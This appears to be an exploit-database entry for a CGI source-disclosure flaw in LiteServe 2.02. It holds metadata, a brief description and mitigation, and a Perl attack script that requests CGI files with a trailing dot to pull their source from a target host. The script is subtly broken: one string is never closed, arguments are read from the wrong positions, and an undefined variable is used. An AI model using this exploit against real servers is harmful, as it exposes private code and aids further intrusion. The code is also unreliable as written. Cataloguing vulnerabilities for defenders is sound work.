LiteServe 2.02 and prior - CGI Disclosure

vendor:

LiteServe

by:

Matthew Murphy

7.5

CVSS

HIGH

CGI Disclosure

CWE

Product Name: LiteServe

Affected Version From: 02.02

Affected Version To: 02.02

Patch Exists: NO

Related CWE: N/A

CPE: a:liteserve:liteserve

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2002

LiteServe 2.02 and prior – CGI Disclosure

By constructing a malicious web request, it is possible for a remote attacker to disclose the source code of CGI scripts. Information gained through exploiting this issue may aid an attacker in launching further attacks against the target system.

Mitigation:

Ensure that the web server is configured to prevent the disclosure of source code.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6188/info

By constructing a malicious web request, it is possible for a remote attacker to disclose the source code of CGI scripts. Information gained through exploiting this issue may aid an attacker in launching further attacks against the target system.

#!/usr/bin/perl
#
# LS_FETCH.PL
# By Matthew Murphy
# LiteServe 2.02 and prior - CGI Disclosure
# Usage: perl ls_fetch.pl [filename] [host] [alias] [port]
use IO::Socket;
use URI::Escape;

$alias = "cgi-isapi"; # Default LiteServe CGI alias
$port = 80;
if (@ARGV < 2 || @ARGV > 4) {
print STDOUT "Usage: perl $0 [filename] [host] [alias=cgi-isapi] [port=80]
} else {
if (@ARGV >= 3) {
$alias = $ARGV[2];
}
if (@ARGV == 4) {
$port = $ARGV[3];
}
$filename = $ARGV[1];
$host = $ARGV[2];
$f = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Proto=>"tcp");
$f->autoflush(1);
$b = sprintf("GET /%s/%s. HTTP/1.0\r\n\r\n", $alias, uri_escape($file));
print $f $b;
while (defined($line=<$f>)) {
print STDOUT $line;
}
undef $f;
}